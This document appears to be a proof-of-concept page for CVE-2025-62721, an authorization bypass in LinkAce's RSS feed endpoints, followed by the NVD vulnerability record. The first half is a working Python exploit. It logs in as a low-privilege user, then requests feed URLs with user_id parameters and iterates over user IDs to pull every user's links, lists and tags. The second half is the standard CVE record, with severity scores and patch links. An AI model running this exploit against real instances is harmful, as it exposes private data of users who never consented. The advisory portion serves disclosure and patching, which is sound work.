CVE-2025-62721

# CVE-2025-62721 PoC - LinkAce RSS Feed Authorization Bypass # Affected versions: LinkAce <= 2.3.1 # Fixed in: LinkAce 2.4.0 import requests import sys TARGET_URL = "http://target-linkace-instance.com" ATTACKER_USERNAME = "[email protected]" ATTACKER_PASSWORD = "password123" TARGET_USER_ID = 1 # ID of the target user to extract data from def exploit(): """ Exploitation steps: 1. Authenticate with a low-privilege account 2. Access RSS feed endpoints to retrieve all users' data 3. Bypass ownership/visibility controls """ session = requests.Session() # Step 1: Login with low-privilege account login_url = f"{TARGET_URL}/login" login_data = { "email": ATTACKER_USERNAME, "password": ATTACKER_PASSWORD } response = session.post(login_url, data=login_data) if response.status_code != 200: print("[-] Login failed") return False print("[+] Login successful with low-privilege account") # Step 2: Access RSS feed endpoint to bypass authorization # The vulnerable endpoint does not check if the requested user_id belongs to the current user rss_urls = [ f"{TARGET_URL}/api/feed/links?user_id={TARGET_USER_ID}", f"{TARGET_URL}/api/feed/lists?user_id={TARGET_USER_ID}", f"{TARGET_URL}/api/feed/tags?user_id={TARGET_USER_ID}", f"{TARGET_URL}/rss/all?user_id={TARGET_USER_ID}" ] for url in rss_urls: response = session.get(url) if response.status_code == 200: print(f"[+] Successfully accessed data from: {url}") print(f" Data preview: {response.text[:200]}...") else: print(f"[-] Failed to access: {url}") # Step 3: Extract all users' data by iterating through user IDs print("\n[*] Extracting data for all users...") for user_id in range(1, 100): url = f"{TARGET_URL}/api/feed/links?user_id={user_id}" response = session.get(url) if response.status_code == 200 and len(response.text) > 50: print(f"[+] User {user_id} data extracted: {len(response.text)} bytes") print("[!] Authorization bypass successful - all users' data exposed") return True if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2025-62721", "sourceIdentifier": "[email protected]", "published": "2025-11-04T22:16:39.120", "lastModified": "2025-11-10T19:56:06.980", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LinkAce is a self-hosted archive to collect website links. In versions 2.3.1 and below, authenticated RSS feed endpoints in the FeedController class fail to implement proper authorization checks, allowing any authenticated user to access all links, lists, and tags from all users in the system, regardless of their ownership or visibility settings. This issue is fixed in version 2.4.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-284"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linkace:linkace:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.4.0", "matchCriteriaId": "68ED0A13-FFAB-4927-A526-E51A4CA1B2BC"}]}]}], "references": [{"url": "https://github.com/Kovah/LinkAce/commit/1fef32694cee2bd80892fb478416be9364c3fddd", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Kovah/LinkAce/releases/tag/v2.4.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/Kovah/LinkAce/security/advisories/GHSA-47g2-qw6q-cr96", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/Kovah/LinkAce/security/advisories/GHSA-47g2-qw6q-cr96", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}